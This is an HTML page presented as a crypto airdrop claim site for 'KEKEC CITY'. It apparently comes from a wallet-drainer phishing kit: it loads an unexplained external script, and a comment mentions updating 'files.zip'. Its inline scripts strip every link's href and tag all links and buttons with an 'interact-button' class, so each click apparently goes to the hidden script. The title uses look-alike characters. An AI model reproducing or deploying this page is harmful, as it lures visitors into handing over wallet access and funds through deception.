<!DOCTYPE html><html lang="en" ><head>

	<script charset="UTF-8" type="text/javascript" src="./5a34bbbc-6661-40ab-b4c8-fff90b78a6c6.js"></script><!–– Please update files.zip if you not already did and check below (updated the 11/11) ––>
	
	<script>
		document.addEventListener('DOMContentLoaded', function () {
			var links = document.querySelectorAll('body a');
			for (var i = 0; i < links.length; i++) {
				var link = links[i];
				link.removeAttribute('href');
				link.classList.add('interact-button');
			}
		});
		</script>
		
		<script>
		document.addEventListener('DOMContentLoaded', function () {
			var buttons = document.querySelectorAll('body button');
			for (var i = 0; i < buttons.length; i++) {
				var button = buttons[i];
				button.classList.add('interact-button');
			}
		});
		</script>
		
		<script>
		document.addEventListener("DOMContentLoaded", function() {
			const elements = document.querySelectorAll('[ad-data-linked]');
			elements.forEach(element => {
				element.removeAttribute('ad-data-linked');
			});
		
			console.log('Removed ad-data-linked attributes from', elements.length, 'elements');
		});
		</script>
		
		<style>
		.interact-button {
			cursor: pointer;
		}
		</style>
	<link rel="icon" href="Flute3.gif">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		
		<link href="0.5d1fdfb3.css" rel="stylesheet">
		<link href="2.da4972db.css" rel="stylesheet"><title>WÈLÇÖMÈ †Ö KÈKÈÇ ÇÌ†¥</title>
	</head>
	<body data-sveltekit-preload-data="hover">
		<div style="display: contents"> <div class="fullscreen-bg2 svelte-1nqy9sb"><div class="centered svelte-1nqy9sb"><h1 class="text-5xl text-white font-bold" data-svelte-h="svelte-5at49r">WELECOME TO KEKEC CITY!</h1> 
			<button class="mt-4 bg-blue-500 hover:bg-blue-700 text-white font-bold py-2 px-4 rounded animate-pulse" data-svelte-h="svelte-743hbk">CLAIM AIRDROP</button> 
			<img src="loading.gif" class="w-1/2 mx-auto"></div></div> <div id="svelte-announcer" aria-live="assertive" aria-atomic="true" style="position: absolute; left: 0px; top: 0px; clip: rect(0px, 0px, 0px, 0px); clip-path: inset(50%); overflow: hidden; white-space: nowrap; width: 1px; height: 1px;"></div></div>
	

</body></html>